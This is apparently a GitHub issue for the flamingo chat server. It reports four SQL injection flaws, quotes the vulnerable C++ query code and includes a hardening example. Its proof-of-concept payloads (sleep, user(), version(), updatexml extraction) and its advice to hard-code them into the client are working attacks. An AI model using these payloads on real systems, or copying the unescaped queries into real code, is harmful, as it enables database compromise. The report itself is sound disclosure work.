balloonwj / flamingo

flamingo: a high-performance, lightweight, open-source instant messaging application


There are security risks in the server's operations on the database

marckwei opened this issue

Issue 1

Vulnerability

There is a SQL injection vulnerability in the UserManager::addUser method.
The business logic corresponding to this method is account registration.
userid, username, and nickname can be controlled; there are no filtering measures, and the entire SQL statement is executed directly.

Looking at the code, it is found that the client does not encrypt the transmitted data, and the registration information is sent to the server in clear text. Therefore, it can be injected directly from the client registration window.

```cpp
bool UserManager::addUser(User& u)
{
    // ……
    char sql[256] = { 0 };
    // username, nickname and password are interpolated into the statement unescaped
    snprintf(sql, 256, "INSERT INTO t_user(f_user_id, f_username, f_nickname, f_password, f_register_time) VALUES(%d, '%s', '%s', '%s', NOW())", m_baseUserId.load(), u.username.c_str(), u.nickname.c_str(), u.password.c_str());
    if (!pConn->execute(sql))
    {
        LOGW("insert user error, sql: %s", sql);
        return false;
    }
    // ……
}
```

PoC

payload: `ad','ad','ads',sleep(10));#` or `ad','ad','ads',user());#`

Issue 2

Vulnerability

There is a SQL injection vulnerability in the UserManager::updateUserTeamInfoInDbAndMemory method.

newteaminfo can be controlled.

```cpp
bool UserManager::updateUserTeamInfoInDbAndMemory(int32_t userid, const std::string& newteaminfo)
{
    // ……
    std::ostringstream osSql;
    // newteaminfo is concatenated into the statement unescaped
    osSql << "UPDATE t_user SET f_teaminfo='"
        << newteaminfo << "' WHERE f_user_id="
        << userid;
    if (!pConn->execute(osSql.str().c_str()))
    {
        LOGE("Update Team Info error, sql: %s", osSql.str().c_str());
        return false;
    }
    // ……
}
```

PoC

The client has an input length limit, but the client-side defense is ineffective; hard-code the payload into the program.

payload: `1"}]' or updatexml(2,concat(0x7e,version()),0) or'`

Issue 3

Vulnerability

There is a SQL injection vulnerability in the UserManager::addGroup method.

groupname can be controlled.

```cpp
bool UserManager::addGroup(const char* groupname, int32_t ownerid, int32_t& groupid)
{
    // ……
    ++m_baseGroupId;
    char sql[256] = { 0 };
    // groupname is interpolated into the statement unescaped
    snprintf(sql, 256, "INSERT INTO t_user(f_user_id, f_username, f_nickname, f_password, f_owner_id, f_register_time) VALUES(%d, '%d', '%s', '', %d,  NOW())", m_baseGroupId.load(), m_baseGroupId.load(), groupname, ownerid);
    if (!pConn->execute(sql))
    {
        LOGE("insert group error, sql: %s", sql);
        return false;
    }
    // ……
}
```

The create-group-chat function can trigger this method.

payload: `1','','1',version());#`

The client has an input length limit, but the client-side defense is ineffective; hard-code the payload into the program.

Find the place where the client sends the JSON, and hard-code the payload in.

Issue 4

Vulnerability

There is a SQL injection vulnerability in the UserManager::updateUserInfoInDb method.

```cpp
bool UserManager::updateUserInfoInDb(int32_t userid, const User& newuserinfo)
{
    // ……
    std::ostringstream osSql;
    // every string field of newuserinfo is concatenated into the statement unescaped
    osSql << "UPDATE t_user SET f_nickname='"
          << newuserinfo.nickname << "', f_facetype="
          << newuserinfo.facetype << ", f_customface='"
          << newuserinfo.customface << "', f_gender="
          << newuserinfo.gender << ", f_birthday="
          << newuserinfo.birthday << ", f_signature='"
          << newuserinfo.signature << "', f_address='"
          << newuserinfo.address << "', f_phonenumber='"
          << newuserinfo.phonenumber << "', f_mail='"
          << newuserinfo.mail << "' WHERE f_user_id="
          << userid;
    if (!pConn->execute(osSql.str().c_str()))
    {
        LOGE("UpdateUserInfo error, sql: %s", osSql.str().c_str());
        return false;
    }
    // ……
}
```

PoC

payload: `1' or updatexml(2,concat(0x7e,version()),0) or'`
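All four issues above share one root cause: user-controlled strings are concatenated into the statement text. The following is an added example, not flamingo's code, showing the hardened counterpart of the `addUser` INSERT. The preferred fix is a server-side prepared statement (`mysql_stmt_prepare` with `mysql_stmt_bind_param` in the MySQL C API), which keeps user data out of the statement text entirely; the helpers here are the fallback when the string-building path is kept, and they compile without libmysqlclient so the behaviour can be checked offline. The function names `escapeSqlLiteral`, `isValidUsername`, `hasUnescapedQuote`, `buildAddUserSql` and `buildRegistrationSql` are all hypothetical, and the sample inputs are the payloads quoted in the issues plus constructed benign values.

```cpp
#include <cctype>
#include <cstdint>
#include <cstdio>
#include <string>

// Added example; hypothetical helpers, not part of flamingo.

// Escape a value for inclusion in a single-quoted MySQL string literal.
// Covers the characters mysql_real_escape_string() escapes when
// NO_BACKSLASH_ESCAPES is off: NUL, \n, \r, backslash, ', " and Ctrl-Z.
std::string escapeSqlLiteral(const std::string& in) {
    std::string out;
    out.reserve(in.size() * 2);
    for (unsigned char c : in) {
        switch (c) {
            case '\0':   out += "\\0";  break;
            case '\n':   out += "\\n";  break;
            case '\r':   out += "\\r";  break;
            case '\\':   out += "\\\\"; break;
            case '\'':   out += "\\'";  break;
            case '"':    out += "\\\""; break;
            case '\x1a': out += "\\Z";  break;
            default:     out += static_cast<char>(c); break;
        }
    }
    return out;
}

// Allowlist for account names: 1..32 ASCII letters, digits or '_'.
// Rejecting everything else stops quote-breakout input before it reaches
// the query builder, independently of escaping (defence in depth).
bool isValidUsername(const std::string& s) {
    if (s.empty() || s.size() > 32) return false;
    for (unsigned char c : s) {
        if (!std::isalnum(c) && c != '_') return false;
    }
    return true;
}

// True if the text contains a single quote preceded by an even number of
// backslashes, i.e. one that would close a literal the template opened.
bool hasUnescapedQuote(const std::string& s) {
    size_t backslashes = 0;
    for (char c : s) {
        if (c == '\\') { ++backslashes; continue; }
        if (c == '\'' && backslashes % 2 == 0) return true;
        backslashes = 0;
    }
    return false;
}

// Hardened form of the INSERT from UserManager::addUser: same template, but
// every string value is escaped, and std::string replaces the fixed 256-byte
// buffer so a long value cannot silently truncate the statement.
std::string buildAddUserSql(int32_t userId, const std::string& username,
                            const std::string& nickname, const std::string& password) {
    return "INSERT INTO t_user(f_user_id, f_username, f_nickname, f_password, f_register_time) VALUES("
        + std::to_string(userId) + ", '" + escapeSqlLiteral(username) + "', '"
        + escapeSqlLiteral(nickname) + "', '" + escapeSqlLiteral(password) + "', NOW())";
}

// Registration path: allowlist first, escaped template second. Returns false
// and leaves sqlOut empty when the name is rejected, mirroring the bool
// return of UserManager::addUser.
bool buildRegistrationSql(int32_t userId, const std::string& username,
                          const std::string& nickname, const std::string& password,
                          std::string& sqlOut) {
    sqlOut.clear();
    if (!isValidUsername(username)) return false;
    sqlOut = buildAddUserSql(userId, username, nickname, password);
    return true;
}

int main() {
    // Constructed inputs: the first payload quoted in the issue, and a benign account.
    const std::string payload = "ad','ad','ads',sleep(10));#";
    std::string sql;
    std::printf("payload accepted by allowlist: %s\n",
                buildRegistrationSql(1, payload, "n", "p", sql) ? "yes" : "no");
    std::printf("escaped form of payload: %s\n", escapeSqlLiteral(payload).c_str());
    buildRegistrationSql(2, "alice_01", "O'Brien", "p", sql);
    std::printf("%s\n", sql.c_str());
    return 0;
}
```

The same two steps apply to `updateUserTeamInfoInDbAndMemory`, `addGroup` and `updateUserInfoInDb`: validate fields that have a natural shape (names, phone numbers, dates) against an allowlist, and pass every free-text field (signature, address, team info) through the escape routine or, better, a bound parameter.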

Yes, you are right. If you use flamingo for commercial use, remember to enhance this. Not adding these additional checks and enhancements is just for simplicity for users who study it. @marckwei